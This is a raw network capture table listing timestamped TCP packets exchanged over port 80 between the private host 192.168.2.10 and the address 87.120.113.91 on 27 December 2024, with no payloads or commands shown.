                                                        Dec 27, 2024 14:53:40.548849106 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:40.549187899 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.600094080 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:40.618340969 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.618354082 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.618453979 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:40.620791912 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.620968103 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.621010065 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:40.628618956 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.628652096 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.628710985 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:40.636466026 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.636549950 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.636595964 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:40.644315004 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.644421101 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.644462109 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:40.651750088 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.651906967 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.651958942 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:40.659181118 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.659214973 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.659262896 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:40.666129112 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.666294098 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.666343927 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:40.672758102 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.672858000 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.672898054 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:40.679403067 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.679478884 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.679519892 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:40.700196028 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.700346947 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.700408936 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:40.702289104 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.702380896 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.702416897 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:40.706492901 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.708060026 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.708126068 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:40.708141088 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.712392092 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.712464094 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:40.712479115 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.716526031 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.716588020 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:40.716633081 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.720802069 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.720855951 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:40.720877886 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.725054026 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.725094080 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:40.725162983 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.729233027 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.729285955 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:40.729307890 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.733510971 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.733556032 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:40.733643055 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.737742901 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.737792969 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:40.737865925 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.741995096 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.742042065 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:40.742048979 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.746306896 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.746351004 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:40.746390104 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.750458002 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.750524044 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:40.786859989 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.786921978 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.786971092 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:40.819565058 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.819614887 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.819668055 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:40.821608067 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.822463036 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.822505951 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:40.822535992 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.826600075 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.826654911 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:40.826698065 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.830858946 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.830967903 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:40.830980062 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.835122108 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.835138083 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.835203886 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:40.839373112 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.839426994 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.839427948 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:40.843590021 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.843658924 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:40.843666077 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.847583055 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.847639084 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:40.847704887 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.851370096 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.851417065 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:40.851545095 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.855130911 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.855170965 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.855185032 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:40.858681917 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.858720064 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.858741999 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:40.862164021 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.862209082 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.862230062 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:40.866858006 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.866883993 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.866926908 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:40.868375063 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.868426085 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:40.901469946 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.901498079 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.901644945 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:40.902476072 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.902579069 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.902621984 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:40.904665947 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.904822111 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.904870987 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:40.906723022 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.906850100 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.906894922 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:40.908874989 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.908961058 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.909002066 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:40.911027908 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.911115885 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.911161900 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:40.913186073 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.913285017 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.913327932 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:40.915359974 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.915504932 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.915554047 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:40.917556047 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.917659998 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.917701006 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:40.919671059 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.919780970 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.919830084 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:40.921861887 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.921924114 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.921967983 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:40.924199104 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.924263954 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.924314022 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:40.926383018 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.926451921 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.926495075 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:40.928803921 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.928884029 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.928929090 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:40.930716038 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.930876970 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.930922031 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:40.932765961 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.932848930 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.932903051 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:40.934897900 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.934972048 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.935012102 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:40.936981916 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.937094927 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.937134981 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:40.939193964 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.939254045 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.939307928 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:40.941334963 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.941589117 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.941643953 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:40.943531990 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.943645000 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.943694115 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:40.945715904 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.945786953 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.945827961 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:40.947864056 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.947982073 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.948033094 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:40.949940920 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:40.990746021 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.021516085 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.021624088 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.021687984 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.022562027 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.022994995 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.023047924 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.023137093 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.026154995 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.026190042 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.026202917 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.028450966 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.028500080 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.028537035 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.030040026 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.030082941 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.030114889 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.031641006 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.031692982 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.031716108 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.033778906 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.033821106 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.033829927 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.036046982 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.036092997 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.036094904 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.038105965 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.038149118 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.038208008 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.040306091 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.040354013 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.040357113 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.042273045 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.042318106 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.042423964 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.044306040 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.044342995 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.044358969 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.046201944 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.046237946 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.046242952 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.048130035 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.048167944 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.048177958 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.049963951 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.050018072 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.050064087 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.051738977 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.051800966 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.051866055 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.053627968 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.053670883 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.053750038 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.055327892 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.055377007 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.055393934 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.057039022 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.057080030 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.057121992 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.058801889 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.058844090 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.058909893 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.060432911 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.060466051 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.060482025 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.062093019 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.062153101 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.062226057 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.063739061 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.063793898 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.063807011 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.065289021 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.065335035 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.065414906 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.066869020 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.066931009 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.068069935 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.068217039 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.068259001 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.068661928 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.068943024 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.068977118 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.069031000 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.070167065 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.070205927 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.102762938 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.102785110 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.102833033 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.103324890 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.103493929 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.103535891 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.104581118 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.104690075 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.104732990 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.105962992 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.106007099 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.106070995 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.107317924 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.107435942 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.107484102 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.108335972 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.108402967 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.108444929 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.109601021 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.109716892 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.109786987 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.110853910 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.111021042 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.111059904 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.112129927 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.112227917 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.112262011 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.113383055 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.113488913 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.113528967 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.114644051 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.114739895 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.114778042 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.115943909 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.116055012 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.116107941 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.117140055 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.117254972 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.117300034 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.118396997 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.118436098 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.118488073 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.119649887 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.119755983 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.119808912 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.120928049 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.121043921 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.121087074 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.122153044 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.122272968 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.122313023 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.123439074 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.123545885 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.123588085 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.124655962 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.124751091 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.124789953 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.125936985 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.126017094 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.126051903 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.127187014 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.127335072 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.127378941 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.128432989 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.128549099 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.128587961 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.129695892 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.129795074 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.129838943 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.130956888 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.131057024 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.131094933 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:41.132266998 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:41.132307053 CET804972187.120.113.91192.168.2.10
